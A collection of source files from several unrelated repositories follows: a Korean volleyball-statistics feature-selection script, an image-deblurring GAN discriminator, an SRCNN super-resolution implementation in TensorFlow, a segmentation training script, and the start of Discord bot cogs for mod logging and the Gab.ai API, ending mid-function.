#Extract_F_Data = Female_data_norm[['오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','오픈공격_성공률','오픈공격_효율']]
# 시간차공격
#Extract_M_Data = Male_data_norm[['시간차공격_시도', '시간차공격_성공', '시간차공격_공격차단', '시간차공격_범실','시간차공격_성공률','시간차공격_효율']]
#Extract_F_Data = Female_data_norm[['시간차공격_시도', '시간차공격_성공', '시간차공격_공격차단', '시간차공격_범실','시간차공격_성공률','시간차공격_효율']]
# 이동공격
#Extract_M_Data = Male_data_norm[['이동공격_시도', '이동공격_성공', '이동공격_공격차단', '이동공격_범실']]
#Extract_F_Data = Female_data_norm[['이동공격_시도', '이동공격_성공', '이동공격_공격차단', '이동공격_범실']]
# 후위공격
#Extract_M_Data = Male_data_norm[['후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실','후위공격_성공률','후위공격_효율']]
#Extract_F_Data = Female_data_norm[['후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실','후위공격_성공률','후위공격_효율']]
# 속공
#Extract_M_Data = Male_data_norm[['속공_시도','속공_성공', '속공_공격차단', '속공_범실','속공_성공률','속공_효율']]
#Extract_F_Data = Female_data_norm[['속공_시도','속공_성공', '속공_공격차단', '속공_범실','속공_성공률','속공_효율']]
# 퀵오픈
#Extract_M_Data = Male_data_norm[['퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단','퀵오픈_범실','퀵오픈_성공률','퀵오픈_효율']]
#Extract_F_Data = Female_data_norm[['퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단','퀵오픈_범실','퀵오픈_성공률','퀵오픈_효율']]
# 서브
#Extract_M_Data = Male_data_norm[['서브_시도', '서브_성공', '서브_범실','서브_효율']]
#Extract_F_Data = Female_data_norm[['서브_시도', '서브_성공', '서브_범실','서브_효율']]
# 블로킹
#Extract_M_Data = Male_data_norm[['블로킹_시도','블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트','블로킹_효율']]
#Extract_F_Data = Female_data_norm[['블로킹_시도','블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트','블로킹_효율']]
# 디그
#Extract_M_Data = Male_data_norm[['디그_시도', '디그_성공', '디그_실패', '디그_범실','디그_효율']]
#Extract_F_Data = Female_data_norm[['디그_시도', '디그_성공', '디그_실패', '디그_범실','디그_효율']]
# 세트
#Extract_M_Data = Male_data_norm[['세트_시도', '세트_성공','세트_범실','세트_효율']]
#Extract_F_Data = Female_data_norm[['세트_시도', '세트_성공','세트_범실','세트_효율']]
# 리시브
#Extract_M_Data = Male_data_norm[['리시브_시도', '리시브_정확', '리시브_범실','리시브_효율']]
#Extract_F_Data = Female_data_norm[['리시브_시도', '리시브_정확', '리시브_범실','리시브_효율']]
# 공격 + 블로킹 + 서브 + 세트 +리시브 + 최다연승 + 최다연패
#Extract_M_Data = Male_data_norm[['공격_시도','공격_범실','공격_공격차단','공격_성공','공격_효율','블로킹_시도','블로킹_성공','블로킹_실패','블로킹_범실','서브_시도','서브_범실','서브_성공','세트_시도','세트_범실','세트_성공','리시브_시도','리시브_범실','리시브_정확','최다연패','최다연승']]
#Extract_F_Data = Female_data_norm[['공격_시도','공격_범실','공격_공격차단','공격_성공','공격_효율','블로킹_시도','블로킹_성공','블로킹_실패','블로킹_범실','서브_시도','서브_범실','서브_성공','세트_시도','세트_범실','세트_성공','리시브_시도','리시브_범실','리시브_정확','최다연패','최다연승']]
# 상위 3개 요인 남자(후위공격/공격/오픈공격 : 12개) 여자(오픈공격/공격/리시브 : 11개)
#Extract_M_Data = Male_data_norm[['공격_시도', '공격_성공', '공격_공격차단', '공격_범실','오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실']]
#Extract_F_Data = Female_data_norm[['공격_시도', '공격_성공', '공격_공격차단', '공격_범실','오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','리시브_시도', '리시브_정확', '리시브_범실']]
# 공격 + 블로킹 + 서브 + 세트 + 리시브
#Extract_M_Data = Male_data_norm[['공격_시도','공격_범실','공격_공격차단','공격_성공','블로킹_시도','블로킹_성공','블로킹_실패','블로킹_범실','서브_시도','서브_범실','서브_성공','세트_시도','세트_범실','세트_성공','리시브_시도','리시브_범실','리시브_정확']]
#Extract_F_Data = Female_data_norm[['공격_시도','공격_범실','공격_공격차단','공격_성공','블로킹_시도','블로킹_성공','블로킹_실패','블로킹_범실','서브_시도','서브_범실','서브_성공','세트_시도','세트_범실','세트_성공','리시브_시도','리시브_범실','리시브_정확']]
# 상위 5개 요인 남자(세트/오픈공격/후위공격/서브/속공) 여자(오픈공격/퀵오픈/후위공격/리시브/세트)
#Extract_M_Data = Male_data_norm[['오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','오픈공격_성공률', '오픈공격_효율',
# '후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실','후위공격_성공률','후위공격_효율',
# '속공_시도','속공_성공', '속공_공격차단', '속공_범실','속공_성공률','속공_효율',
# '서브_시도', '서브_성공', '서브_범실','서브_효율',
# '세트_시도','세트_성공','세트_범실','세트_효율']]
#Extract_F_Data = Female_data_norm[['오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','오픈공격_성공률', '오픈공격_효율',
# '후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실','후위공격_성공률','후위공격_효율',
# '퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단','퀵오픈_범실','퀵오픈_성공률','퀵오픈_효율',
# '세트_시도', '세트_성공','세트_범실','세트_효율',
# '리시브_시도', '리시브_정확', '리시브_범실','리시브_효율']]
# 배구 5개 요인 남자(오픈공격/블로킹/서브/리시브/세트) 여자(오픈공격/블로킹/서브/리시브.세트)
#Extract_M_Data = Male_data_norm[['공격_시도', '공격_성공', '공격_공격차단', '공격_범실','공격_성공률', '공격_효율',
# '블로킹_시도','블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트','블로킹_효율',
# '서브_시도', '서브_성공', '서브_범실','서브_효율',
# '세트_시도','세트_성공','세트_범실','세트_효율',
# '리시브_시도', '리시브_정확', '리시브_범실','리시브_효율','최다연승','최다연패']]
#Extract_F_Data = Female_data_norm[['공격_시도', '공격_성공', '공격_공격차단', '공격_범실','공격_성공률', '공격_효율',
# '블로킹_시도','블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트','블로킹_효율',
# '서브_시도', '서브_성공', '서브_범실','서브_효율',
# '세트_시도','세트_성공','세트_범실','세트_효율',
# '리시브_시도', '리시브_정확', '리시브_범실','리시브_효율','최다연승','최다연패']]
# Top 3 per-part factors by division - men: open attack / serve / set / longest streaks, women: open attack / set / receive / longest streaks
Extract_M_Data = Male_data_norm[['오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','오픈공격_성공률', '오픈공격_효율',
# '공격_시도', '공격_성공', '공격_공격차단', '공격_범실','공격_성공률', '공격_효율',
'서브_시도', '서브_성공', '서브_범실','서브_효율',
'세트_시도','세트_성공','세트_범실','세트_효율',
'최다연승','최다연패']]
Extract_F_Data = Female_data_norm[[#'공격_시도', '공격_성공', '공격_공격차단', '공격_범실','공격_성공률', '공격_효율',
# '오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','오픈공격_성공률', '오픈공격_효율',
'후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실','후위공격_성공률', '후위공격_효율',
#'퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단','퀵오픈_범실','퀵오픈_성공률','퀵오픈_효율',
'세트_시도','세트_성공','세트_범실','세트_효율',
'리시브_시도', '리시브_정확', '리시브_범실','리시브_효율',
'최다연승','최다연패']]
# Remove the bottom 4 factors
#Extract_M_Data = Male_data_norm[['득점', '공격_시도', '공격_성공', '공격_공격차단', '공격_범실',
# '공격_성공률','오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실',
# '오픈공격_성공률', '후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실', '후위공격_성공률', '속공_시도',
# '속공_성공', '속공_공격차단', '속공_범실', '속공_성공률', '퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단',
# '퀵오픈_범실', '퀵오픈_성공률', '서브_시도', '서브_성공', '서브_범실', '서브_세트당평균', '블로킹_시도',
# '블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트', '블로킹_세트당평균',
# '세트_시도', '세트_성공','세트_범실', '세트_세트당평균',]]
#Extract_F_Data = Female_data_norm[['득점', '공격_시도', '공격_성공', '공격_공격차단', '공격_범실',
# '공격_성공률','오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실',
# '오픈공격_성공률', '시간차공격_시도', '시간차공격_성공', '시간차공격_공격차단', '시간차공격_범실',
# '시간차공격_성공률','후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실', '후위공격_성공률', '속공_시도',
# '퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단','퀵오픈_범실', '퀵오픈_성공률', '블로킹_시도',
# '블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트', '블로킹_세트당평균',
# '세트_시도', '세트_성공','세트_범실', '세트_세트당평균', '리시브_시도', '리시브_정확', '리시브_범실', '리시브_세트당평균', '범실']]
# Check the weight (importance) of each feature
def Confirm_feature_weight(table,result):
# Data preprocessing
from sklearn.model_selection import train_test_split
X,y = table.values,result.values
# Hold out 20% of the data as the test set.
X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.2,random_state=0)
# 1. Standardize the data first in order to compare the D-dimensional features. (The data was already normalized above, so this is largely redundant.)
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train_std = sc.fit_transform(X_train)
X_test_std = sc.transform(X_test)
X_train=X_train_std
X_test=X_test_std
# X_cen = X_train - X_train.mean(axis=0)
# cov_mat = np.dot(X_cen.T,X_cen)/len(X_cen)
# 2. Build the covariance matrix to get the pairwise covariances between features.
cov_mat = np.cov(X_train.T) # 공분산 행렬을 생성해주는 함수
# 3. Decompose the covariance matrix into eigenvalues and eigenvectors.
# This is called an eigendecomposition.
Eval,Evec = np.linalg.eig(cov_mat)
print(Eval)
# Store the indices of the eigenvalues in descending order in E_val_des_order; np.argsort(-abs(values)) returns the positions from largest to smallest.
E_val_des_order = np.argsort(-abs(Eval))
print(E_val_des_order)
# 4. Both of these (eigenvalues and eigenvectors) can be derived from the covariance matrix.
tot = sum(Eval)
var_exp = [(i/tot) for i in sorted(Eval,reverse=True)]
# Divide each eigenvalue by the sum of all eigenvalues; each result is that eigenvalue's explained-variance ratio.
# In other words, this expresses as a ratio which eigenvalue explains the most variance.
cum_var_exp = np.cumsum(var_exp) # 누적 합을 계산해주는 함수 -> 누적 백분위로 표현
# plt.figure(figsize=(18,8))
# plt.bar(table.columns[E_val_des_order],var_exp,alpha = 0.5,align='center',
# label = 'individual explained variance')
# plt.step(range(0,len(cum_var_exp)),cum_var_exp,where='mid',
# label='cumulative explained variance')
# plt.xticks(rotation=90)
# plt.ylabel('explained variance ratio')
# plt.xlabel('principal components')
# plt.legend(loc='best')
# plt.tight_layout()
# plt.show()
# # 각각의 항목에 대한 weight값을 텍스트로 나타내는것
# weight_order = table.columns[E_val_des_order]
# for loop in range(0,len(table.columns)):
# print("변수:{}\tweight:{}".format(weight_order[loop],cum_var_exp[loop]))
#print("============================남자경기요인============================")
#Confirm_feature_weight(Male_data_norm,Mplayoff)
#Confirm_feature_weight(Male_data,Mplayoff)
#Confirm_feature_weight(Extract_M_Data,Mplayoff)
#print("============================여자경기요인============================")
#Confirm_feature_weight(Female_data_norm,Fplayoff)
#Confirm_feature_weight(Female_data,Fplayoff)
#Confirm_feature_weight(Extract_M_Data,Mplayoff)
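# --- Side note (not in the original script): the covariance/eigendecomposition
# in Confirm_feature_weight is what PCA computes; a quick cross-check of the
# cumulative explained-variance ratios could be done with scikit-learn, e.g.
#
#   from sklearn.decomposition import PCA
#   pca = PCA().fit(Extract_M_Data.values)
#   print(pca.explained_variance_ratio_.cumsum())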
Male_data['플레이오프진출'] = Mplayoff
Female_data['플레이오프진출'] = Fplayoff
Extract_M_Data['플레이오프진출'] = Mplayoff
Extract_F_Data['플레이오프진출'] = Fplayoff
##print(Extract_M_Data.columns)
##print(Extract_F_Data.columns)
## Save as pickle files.
#Male_data.to_pickle("Male_data")
#Female_data.to_pickle("Female_data")
Extract_M_Data.to_pickle("Extract_M_Data")
Extract_F_Data.to_pickle("Extract_F_Data")
#Extract_M_Data.to_pickle("original_M_Data")
#Extract_F_Data.to_pickle("original_F_Data")
``` |
{
"source": "jinsuyoo/DeepDeblur-PyTorch",
"score": 3
} |
#### File: code/models/discriminator.py
```python
import torch
import torch.nn as nn
class Discriminator(nn.Module):
def __init__(self, negative_slope=0.2):
super(Discriminator, self).__init__()
self.feature_extractor = nn.Sequential(
nn.Conv2d(3, 32, kernel_size=5, stride=1, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(32, 32, kernel_size=5, stride=2, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(32, 64, kernel_size=5, stride=1, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(64, 64, kernel_size=5, stride=2, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(64, 128, kernel_size=5, stride=1, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(128, 128, kernel_size=5, stride=4, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(128, 256, kernel_size=5, stride=1, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(256, 256, kernel_size=5, stride=4, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(256, 512, kernel_size=5, stride=1, padding=2, bias=False),
nn.LeakyReLU(negative_slope, inplace=True),
nn.Conv2d(512, 512, kernel_size=4, stride=4, padding=0, bias=False),
nn.LeakyReLU(negative_slope, inplace=True)
)
self.fc = nn.Linear(512, 1)
def forward(self, x):
out = self.feature_extractor(x)
out = out.view(out.size(0), -1)
out = self.fc(out)
out = torch.sigmoid(out)
return out
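# --- Shape-check sketch (not part of the original file): the stride-2, stride-2,
# stride-4, stride-4 convolutions reduce a 256x256 input to 4x4, and the final
# 4x4/stride-4 convolution brings it to 1x1x512, which matches the 512-unit
# fully connected layer. The batch and input size below are illustrative only.
if __name__ == '__main__':
    d = Discriminator()
    fake_batch = torch.randn(4, 3, 256, 256)   # (batch, RGB, H, W)
    scores = d(fake_batch)                     # sigmoid outputs in (0, 1)
    print(scores.shape)                        # torch.Size([4, 1])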
``` |
{
"source": "jinsuyoo/SRCNN-Tensorflow",
"score": 3
} |
#### File: jinsuyoo/SRCNN-Tensorflow/main.py
```python
import tensorflow as tf
from srcnn import SRCNN
flags = tf.app.flags
flags.DEFINE_integer('epoch', 10000, 'Number of epoch')
flags.DEFINE_integer('batch_size', 128, 'The size of batch images')
flags.DEFINE_integer('image_size', 33, 'The size of sub-image')
flags.DEFINE_integer('label_size', 21, 'The size of label')
flags.DEFINE_integer('scale', 3, 'The up-scale value for training and testing')
flags.DEFINE_float('learning_rate', 1e-4, 'The learning rate of gradient descent algorithm')
flags.DEFINE_float('beta1', 0.9, 'The momentum value of gradient descent algorithm')
flags.DEFINE_string('valid_dataset', 'Set5', 'The name of training dataset')
flags.DEFINE_string('test_dataset_path', 'Test', 'The path of test dataset')
flags.DEFINE_string('test_dataset', 'Set5', 'The name of testing dataset')
flags.DEFINE_string('checkpoint_path', 'checkpoint', 'The path of checkpoint directory')
flags.DEFINE_boolean('use_pretrained', False, 'True for use pre-trained model, False for train on your own')
flags.DEFINE_string('result_dir', 'result', 'The path to save result images')
flags.DEFINE_boolean('is_training', True, 'True for training, False for testing')
FLAGS = flags.FLAGS
def main(_):
with tf.Session() as sess:
srcnn = SRCNN(sess, FLAGS)
if FLAGS.is_training == True:
srcnn.train(FLAGS)
elif FLAGS.is_training == False:
srcnn.test(FLAGS)
else:
print('[*] Please give correct [is_training] value ')
if __name__ == '__main__':
tf.app.run()
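# --- Usage sketch (not part of the original file): typical invocations, assuming
# the training data has already been prepared as described by the flags above.
#
#   # train from scratch
#   python main.py --is_training=True --epoch=10000 --batch_size=128
#
#   # test on Set5 with a pre-trained checkpoint
#   python main.py --is_training=False --use_pretrained=True --test_dataset=Set5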
```
#### File: jinsuyoo/SRCNN-Tensorflow/srcnn.py
```python
import tensorflow as tf
import numpy as np
import os
import time
from tqdm import tqdm
from utils import *
class SRCNN(object):
def __init__(self, sess, config):
self.sess = sess
# The size of training sub-images is 33
# All the convolutional layers have no padding, so the label size is (fsub-f1-f2-f3+3) = (33-9-1-5+3) = 21
self.image_size = [None, None, None, 1]
self.label_size = [None, None, None, 1]
self.build_model()
def build_model(self):
self.images = tf.placeholder(tf.float32, self.image_size, name='images')
self.labels = tf.placeholder(tf.float32, self.label_size, name='labels')
self.weights = {
'w1': tf.Variable(tf.random_normal([9, 9, 1, 64], stddev=0.001), name='w1'),
'w2': tf.Variable(tf.random_normal([1, 1, 64, 32], stddev=0.001), name='w2'),
'w3': tf.Variable(tf.random_normal([5, 5, 32, 1], stddev=0.001), name='w3')
}
self.biases = {
'b1': tf.Variable(tf.zeros([64]), name='b1'),
'b2': tf.Variable(tf.zeros([32]), name='b2'),
'b3': tf.Variable(tf.zeros([1]), name='b3')
}
self.forward = self.model()
# Loss Function : Mean Square Error
self.loss = tf.reduce_mean(tf.square(tf.subtract(self.labels, self.forward)))
# Clip output
self.result = tf.clip_by_value(self.forward, clip_value_min=0., clip_value_max=1.)
self.saver = tf.train.Saver()
# Input : (33 x 33 x 1)
# Layer1 : (9 x 9 x 1 x 64)
# Layer2 : (1 x 1 x 64 x 32)
# Layer3 : (5 x 5 x 32 x 1)
# Output : (21 x 21 x 1)
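    # Added note (derived from the shapes above): with 'VALID' padding each k x k
    # conv trims (k - 1) pixels, so the spatial size shrinks 33 - 8 - 0 - 4 = 21,
    # matching the label size.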
def model(self):
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(self.images, self.weights['w1'], strides=[1,1,1,1], padding='VALID'), self.biases['b1']))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, self.weights['w2'], strides=[1,1,1,1], padding='VALID'), self.biases['b2']))
output = tf.nn.bias_add(tf.nn.conv2d(conv2, self.weights['w3'], strides=[1,1,1,1], padding='VALID'), self.biases['b3'])
return output
def train(self, config):
print('[*] SRCNN training will be started ! ')
if not exist_train_data():
print('[!] No train data ready .. Please generate train data first with Matlab')
return
else:
train_images, train_labels = load_train_data()
print('[*] Successfully load train data ! ')
valid_images, valid_labels = prepare_data(config, is_valid=True)
# Adam optimizer with the standard backpropagation
# The learning rate is 1e-4 for the first two layers, and 1e-5 for the last layer
# beta1 is 0.9 in paper
var_list1 = [self.weights['w1'], self.weights['w2'], self.biases['b1'], self.biases['b2']]
var_list2 = [self.weights['w3'], self.biases['b3']]
opt1 = tf.train.AdamOptimizer(config.learning_rate, beta1=config.beta1)
opt2 = tf.train.AdamOptimizer(config.learning_rate * 0.1, beta1=config.beta1)
grads = tf.gradients(self.loss, var_list1 + var_list2)
grads1 = grads[:len(var_list1)]
grads2 = grads[len(var_list1):]
train_op1 = opt1.apply_gradients(zip(grads1, var_list1))
train_op2 = opt2.apply_gradients(zip(grads2, var_list2))
self.train_op = tf.group(train_op1, train_op2)
#self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)
# Initialize TensorFlow variables
init = tf.global_variables_initializer()
self.sess.run(init)
# Load checkpoint
self.load(config)
start_time = time.time()
bicubic_psnr = []
print('[*] Start training ... Please be patient !')
for i in tqdm(range(config.epoch), desc='[*] Keep going ! ', leave=True):
loss = 0
batch_idxs = len(train_images) // config.batch_size
for idx in range(batch_idxs):
batch_images = train_images[idx*config.batch_size : (idx+1)*config.batch_size]
batch_labels = train_labels[idx*config.batch_size : (idx+1)*config.batch_size]
_, err = self.sess.run([self.train_op, self.loss], feed_dict={self.images: batch_images, self.labels: batch_labels})
loss += err
valid_psnr = []
for idx in range(len(valid_images)):
h, w, _ = valid_images[idx].shape
valid_input_y = valid_images[idx][:, :, 0]
valid_label_y = valid_labels[idx][:, :, 0]
valid_input_y = valid_input_y.reshape([1, h, w, 1])
valid_label_y = valid_label_y.reshape([1, h, w, 1])
result = self.sess.run(self.result, feed_dict={self.images: valid_input_y, self.labels: valid_label_y})
valid_label_y = crop_border(valid_label_y[0])
if i == 0:
bicubic_psnr.append(psnr(valid_label_y, crop_border(valid_input_y[0])))
valid_psnr.append(psnr(valid_label_y, result[0]))
print('[*] Epoch: [{:d}], psnr: [bicubic: {:.2f}, srcnn: {:.2f}], loss: [{:.8f}]'.format(i+1, np.mean(bicubic_psnr), np.mean(valid_psnr), loss/batch_idxs))
# Save model for every 50 epoch
if (i+1) % 50 == 0:
self.save(i+1, config)
print('[*] Training done ! Congrats :) ')
def test(self, config):
print('[*] SRCNN testing will be started ! ')
t = time.strftime('%Y-%m-%d-%H%M%S', time.localtime(time.time()))
test_images, test_labels = prepare_data(config, is_valid=False)
init = tf.global_variables_initializer()
results = []
bicubic_psnr = []
test_psnr = []
print('[*] Start testing !')
self.sess.run(init)
self.load(config)
for idx in tqdm(range(len(test_images))):
h, w, _ = test_images[idx].shape
test_input_y = test_images[idx][:, :, 0]
test_label_y = test_labels[idx][:, :, 0]
test_input_cbcr = test_images[idx][:, :, 1:3]
test_label_cbcr = test_labels[idx][:, :, 1:3]
test_input_y = test_input_y.reshape([1, h, w, 1])
test_label_y = test_label_y.reshape([1, h, w, 1])
test_input_cbcr = test_input_cbcr.reshape([1, h, w, 2])
test_label_cbcr = test_label_cbcr.reshape([1, h, w, 2])
result = self.sess.run(self.result, feed_dict={self.images: test_input_y, self.labels: test_label_y})
test_input_y = crop_border(test_input_y[0])
test_label_y = crop_border(test_label_y[0])
test_input_cbcr = crop_border(test_input_cbcr[0])
test_label_cbcr = crop_border(test_label_cbcr[0])
bicubic_psnr.append(psnr(test_label_y, test_input_y))
test_psnr.append(psnr(test_label_y, result[0]))
gt = concat_ycrcb(test_label_y, test_label_cbcr)
bicubic = concat_ycrcb(test_input_y, test_input_cbcr)
result = concat_ycrcb(result[0], test_input_cbcr)
path = os.path.join(os.getcwd(), config.result_dir)
path = os.path.join(path, t)
if not os.path.exists(path):
os.makedirs(path)
save_result(path, gt, bicubic, result, idx)
print('[*] PSNR of ground truth and bicubic : {:.2f}'.format(np.mean(bicubic_psnr)))
print('[*] PSNR of ground truth and SRCNN : {:.2f}'.format(np.mean(test_psnr)))
def save(self, epoch, config):
model_name = 'srcnn'
model_dir = 'SRCNN'
path = os.path.join(config.checkpoint_path, model_dir)
if not os.path.exists(path):
os.makedirs(path)
self.saver.save(self.sess, os.path.join(path, model_name), global_step=epoch)
print('[*] Save checkpoint at {:d} epoch'.format(epoch))
def load(self, config):
if config.use_pretrained:
model_dir = 'SRCNN_pretrained'
else:
model_dir = 'SRCNN'
path = os.path.join(config.checkpoint_path, model_dir)
ckpt_path = tf.train.latest_checkpoint(path)
if ckpt_path:
self.saver.restore(self.sess, ckpt_path)
print('[*] Load checkpoint: {}'.format(ckpt_path))
else:
print('[*] No checkpoint to load ... ')
```
#### File: jinsuyoo/SRCNN-Tensorflow/utils.py
```python
import tensorflow as tf
import numpy as np
import math
from PIL import Image
from tqdm import tqdm
import os
import h5py
FLAGS = tf.app.flags.FLAGS
# Read image
def imread(fname):
return Image.open(fname)
# Save image
def imsave(image, path, fname):
image = image * 255.
image = Image.fromarray(image.astype('uint8'), mode='YCbCr')
image = image.convert('RGB')
return image.save(os.path.join(path, fname))
# Save ground truth image, bicubic interpolated image and srcnn image
def save_result(path, gt, bicubic, srcnn, i):
imsave(gt, path, str(i)+ '_gt.png')
imsave(bicubic, path, str(i) + '_bicubic.png')
imsave(srcnn, path, str(i) + '_srcnn.png')
# Load sub-images of the dataset
def load_train_data():
with h5py.File('train.h5', 'r') as f:
images = np.array(f.get('data'))
labels = np.array(f.get('label'))
return images, labels
# Return true if the h5 sub-images file is exists
def exist_train_data():
return os.path.exists('train.h5')
def prepare_data(config, is_valid=False):
if is_valid:
dataset = config.valid_dataset
path = os.path.join(config.test_dataset_path, dataset)
else:
dataset = config.test_dataset
path = os.path.join(config.test_dataset_path, dataset)
dir_path = os.path.join(os.getcwd(), path)
path_gt = os.path.join(dir_path, 'gt')
path_lr = os.path.join(dir_path, 'bicubic_{:d}x'.format(config.scale))
# fnames = ['baby_GT.bmp, bird_GT.bmp, ...']
fnames = os.listdir(path_gt)
inputs = []
labels = []
count = 0
for fname in tqdm(fnames, desc='[*] Generating dataset ... '):
count += 1
_input = imread(os.path.join(path_lr, fname))
_label = imread(os.path.join(path_gt, fname))
_input = np.array(_input)
_label = np.array(_label)
inputs.append(_input / 255.)
labels.append(_label / 255.)
if is_valid:
print('[*] Successfully prepared {:d} valid images !'.format(count))
else:
print('[*] Successfully prepared {:d} test images !'.format(count))
return inputs, labels
# Concatenate Y and CrCb channel
def concat_ycrcb(y, crcb):
return np.concatenate((y, crcb), axis=2)
# Crop border of the image
def crop_border(image):
padding = int((5+9+1-3)/2)
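    # (9 + 1 + 5 - 3) / 2 = 6: the three VALID convolutions trim 12 rows/columns
    # in total, so 6 pixels are cropped from each border to align with the output.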
if image.ndim == 3:
h, w, _ = image.shape
else:
h, w = image.shape
return image[padding:h-padding, padding:w-padding]
# Compute Peak Signal to Noise Ratio
# PSNR = 20 * log (MAXi / root(MSE))
def psnr(label, image, max_val=1.):
h, w, _ = label.shape
diff = image - label
rmse = math.sqrt(np.mean(diff ** 2))
if rmse == 0:
return 100
else:
return 20 * math.log10(max_val / rmse)
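# Worked example (illustrative numbers): with max_val = 1.0 and an RMSE of 0.1
# between label and image, psnr = 20 * log10(1.0 / 0.1) = 20 dB; a perfect
# reconstruction (rmse == 0) is capped at 100 above.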
``` |
{
"source": "jinsuyun/DriavablaMap_Segmentation",
"score": 2
} |
#### File: jinsuyun/DriavablaMap_Segmentation/Train.py
```python
from tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler, TensorBoard
import tensorflow as tf
import Data
import Model
# import myslack
import os
import argparse
from tensorflow.python.client import device_lib
import warnings
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser(description='Segmentation model training')
parser.add_argument('--gpus', default='3', type=str, help='Which GPUs you want to use? (0,1,2,3)')
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpus
# myslack.send_slack("start")
# path = 'D:/Models/'
path = 'Models/gpu2/'
# path = 'Models/'
#gpus = tf.config.experimental.list_logical_devices('GPUS')
#if gpus:
# tf.config.experimental.set_memory_growth(gpus[0], True)
def scheduler(epoch):
warmup = 3
warmup_lr = 1e-5 # 0.00001
threshold = 15
lr = 1e-4 # 0.0001
lr2 = 5e-5 # 0.00005
if epoch < warmup:
return warmup_lr
elif epoch == warmup:
return (lr + warmup_lr) / 2
elif epoch < threshold:
return lr
else:
return lr2
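# Illustrative values produced by scheduler() with the constants above:
#   epochs 0-2   -> 1e-5 (warm-up)
#   epoch  3     -> (1e-4 + 1e-5) / 2 = 5.5e-5 (transition step)
#   epochs 4-14  -> 1e-4
#   epochs 15+   -> 5e-5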
callback = [
ModelCheckpoint(path + 'model_{epoch:02d}-{val_iou_acc:.4f}_{iou_acc:.4f}.h5'),
LearningRateScheduler(scheduler, verbose=1),
# TensorBoard('./logs/', profile_batch=2)
]
#with tf.device('/XLA_GPU:0'):
b = 4
tr_batch = Data.Load_tr(batch_size=b)
te_batch = Data.Load_te(batch_size=b)
print(tr_batch)
c = 3
model = Model.SegModel(3)
model.load()
model.fit(tr_batch, te_batch, callback)
# myslack.send_slack("finish")
``` |
{
"source": "Jintaku/Trusty-cogs",
"score": 2
} |
#### File: Trusty-cogs/extendedmodlog/__init__.py
```python
from .extendedmodlog import ExtendedModLog
def setup(bot):
bot.add_cog(ExtendedModLog(bot))
```
#### File: Trusty-cogs/gabai/gabai.py
```python
import discord
from redbot.core import commands, checks, Config
import asyncio
import aiohttp
from datetime import datetime
from .gabuser import GabUser
__version__ = "2.0.1"
__author__ = "TrustyJAID"
BASE_URL = "https://api.gab.com/v1.0/"
class GabaiError(Exception):
pass
class NotFoundError(GabaiError):
pass
class Gabai(getattr(commands, "Cog", object)):
"""
Get information from gab.ai and display on discord
"""
def __init__(self, bot):
self.bot = bot
self.config = Config.get_conf(self, 17864784635)
default_global = {
"api_token": {"client_id": "", "client_secret": "", "token": {}, "refresh_time": 0}
}
self.config.register_global(**default_global)
self.session = aiohttp.ClientSession(loop=self.bot.loop)
self.rate_limit_remaining = 60
self.rate_limit_time = 0
@commands.group()
async def gab(self, ctx):
"""
        Commands for getting information from gab.ai
"""
pass
async def refresh_token(self):
        api_token = await self.config.api_token()
params = {
"grant_type": "refresh_token",
"refresh_token": api_token["token"]["refresh_token"],
"client_id": api_token["client_id"],
"client_secret": api_token["client_secret"],
"scope": "read engage-user engage-post write-post notifications",
}
async with self.session.post("https://api.gab.com/oauth/token", json=params) as resp:
token = await resp.json()
await self.config.api_token.token.set(token)
await self.config.api_token.refresh_time.set(
